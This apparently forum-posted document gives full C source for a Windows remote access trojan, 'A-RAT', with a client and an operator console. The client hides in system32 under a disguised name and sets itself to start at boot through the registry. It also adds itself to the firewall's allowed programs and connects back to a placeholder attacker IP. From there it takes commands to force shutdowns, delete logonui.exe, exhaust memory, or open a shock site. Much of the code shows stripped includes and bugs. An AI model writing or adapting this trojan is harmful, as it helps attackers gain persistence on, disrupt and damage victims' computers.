Examples of how to code a RAT in C Client: /* A-RAT BY Shoxin/Akiimoko */ #include #include #include #ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */ #include #endif #include #define MAXPENDING 5 #define BUFFER_SIZE 1024 #define LISTENING_PORT 31337 #define RANDOM_PORT 55555 #define CLIENT "taskmgrbak" #define SERVER_IP "Your IP Here" int func_proc(char c) { switch(c) { case 's': case 'S': system("shutdown -s -t 01 -f"); /* when implementing this feature ExitW indowEx would not function properly in the tests so i used system("shutdown" ) for the time being. */ break; case 't': case 'T': SetWindowText(FindWindow(0,"Windows Live Messenger"),"You just got served!" ); break; case 'm': case 'M': while(1); { char *a = malloc(20971520); char *a2 = malloc(20971520); a = a2; } break; case 'd': case 'D': remove("C:\\WINDOWS\\system32\\logonui.exe"); break; case 'n': case 'N': ShellExecute( NULL, "open", "notepad.exe", NULL, NULL, SW_SHOW); case 'o': case 'O': ShellExecute( NULL, "open", "http://www.meatspin.com", NULL, NULL, SW_SHOW); break; } } int main(int argc, char **argv) { HKEY autoKey; HKEY fwKey; int menu_switch = 0, message_length = 0, remote_length = 0; SOCKET local_socket, remote_socket,message_len; struct sockaddr_in local_address, remote_addr; WSADATA wsa_data; char message[BUFFER_SIZE], remote_ip[32]; int recv_timeout = 90000, send_timeout = 90000, recv_buffer_len; CopyFile("Client.exe", "c:\\windows\\system32\\taskmgrbak.exe", 0); RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\ \Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &autoKey, 0); RegSetValueExA(autoKey, "windows firewall", 0, REG_SZ, CLIENT, 50); RegCloseKey(autoKey); RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\" "SharedAcc ess\\Parameters\\FirewallPolicy\\StandardProfile\\" "AuthorizedApplications", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_AL L_ACCESS, NULL, &fwKey, 0); RegSetValueExA(fwKey, "windows live update", 0, REG_SZ, CLIENT, 50); RegCloseKey(fwKey); sleep(60000); if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0) { fprintf(stderr, "WSAStartup failed\n"); return 1; WSACleanup(); } if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { fprintf(stderr, "socketing failed\n"); return 1; WSACleanup(); } if((remote_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { fprintf(stderr, "socket() failed"); return 1; WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } memset(&local_address, 0, sizeof(local_address)); local_address.sin_family = AF_INET; local_address.sin_addr.s_addr = htonl(INADDR_ANY); local_address.sin_port = htons(RANDOM_PORT); if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address)) != 0) { fprintf(stderr, "binding failed\n"); return 1; WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } memset(&remote_addr, 0, sizeof(remote_addr)); remote_addr.sin_family = AF_INET; remote_addr.sin_port = htons(31337); remote_addr.sin_addr.S_un.S_addr = inet_addr(SERVER_IP); if(connect(remote_socket, (struct sockaddr *) &remote_addr, sizeof(remote_addr)) == SOCKET_ERROR) { fprintf(stderr, "connecting failed\n"); return 1; WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } remote_length = sizeof(remote_addr); if(setsockopt(local_socket, SOL_SOCKET, SO_RCVTIMEO, (const char *) &recv_timeout , sizeof(recv_timeout)) == SOCKET_ERROR) { fprintf(stderr, "recv_timeout failed\n"); WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } if(setsockopt(local_socket, SOL_SOCKET, SO_SNDTIMEO, (const char *) &send_timeout , sizeof(send_timeout)) == SOCKET_ERROR) { fprintf(stderr, "send_timeout failed\n"); WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } while(1) { if((message_len = recv(remote_socket, message, sizeof(message), 0)) == SOCKET_ ERROR) { fprintf(stderr, "recv failed\n"); return 1; WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } func_proc(*message); } WSACleanup(); closesocket(local_socket), closesocket(remote_socket); return 0; } Hosting: /* A-RAT BY Shoxin/Akimoko*/ #include #include #ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */ #include #endif #include #define MAXPENDING 5 #define BUFFER_SIZE 1024 #define LISTENING_PORT 31337 int main(int argc, char **argv) { SetConsoleTitle("A-RAT - Shoxin"); SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_BLUE | FOREGR OUND_INTENSITY ); int menu_switch = 0, message_length = 0, remote_length = 0; SOCKET local_socket, remote_socket,message_len; struct sockaddr_in local_address, remote_address; WSADATA wsa_data; char message[BUFFER_SIZE], remote_ip[32]; printf("Aki-RAT v.0.1b \n" "By Shoxin \n" " \n" "::Developer Version:: \n" " \n" "shouts: \n" "dw0rek,Mad-Hatter,g00ns.net \n"); printf("Features/Usage: \n" " \n" ".Remote Shutdown[S] \n" ".Rename Windows Live Messenger Title[T] \n" ".Delete Logonui.exe[D] \n" ".Extreme Memory Leak[M] \n" ".Open Notepad[N] \n" ".Open Meatspin.com[O] \n" " \n" "Usage: 'S'\n" " 'T'\n" " 'D'\n" " 'M'\n" " etc. \n"); if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0) { fprintf(stderr, "WSAStartup failed\n"); WSACleanup(); return 1; } if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { fprintf(stderr, "socketing failed\n"); WSACleanup(); return 1; } memset(&local_address, 0, sizeof(local_address)); local_address.sin_family = AF_INET; local_address.sin_addr.s_addr = htonl(INADDR_ANY); local_address.sin_port = htons(LISTENING_PORT); if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address)) != 0) { fprintf(stderr, "binding failed\n"); WSACleanup(); closesocket(local_socket), closesocket(remote_socket); return 1; } if(listen(local_socket, MAXPENDING) != 0) { fprintf(stderr, "listening failed\n"); WSACleanup(); closesocket(local_socket), closesocket(remote_socket); return 1; } remote_length = sizeof(remote_address); if((remote_socket = accept(local_socket, (struct sockaddr *) &remote_address, &re mote_length)) == INVALID_SOCKET) { fprintf(stderr, "accepting failed\n"); WSACleanup(); closesocket(local_socket), closesocket(remote_socket); return 1; } printf("Connection Established\n"); message_len = 1; while(1) { printf("-"); *message = getchar(); *(message + message_len) = '\0'; if(send(remote_socket, message, strlen(message), 0) == SOCKET_ERROR) { fprintf(stderr, "send failed\n"); return 1; WSACleanup(); closesocket(local_socket), closesocket(remote_socket); } } WSACleanup(); closesocket(local_socket), closesocket(remote_socket); return 0; }